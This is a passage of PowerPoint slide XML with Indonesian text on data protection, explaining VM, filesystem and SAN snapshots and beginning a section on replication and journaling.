            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hierarki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Snapshot VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di VMware vSphere </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Microsoft Hyper-V, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Snapshot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>berkas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh ZFS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Btrfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Snapshot SAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> snapshot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NetApp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Dell EMC, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> volume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> snapshot VM, filesystem, dan SAN, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjurnalan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjurnalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeliharaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
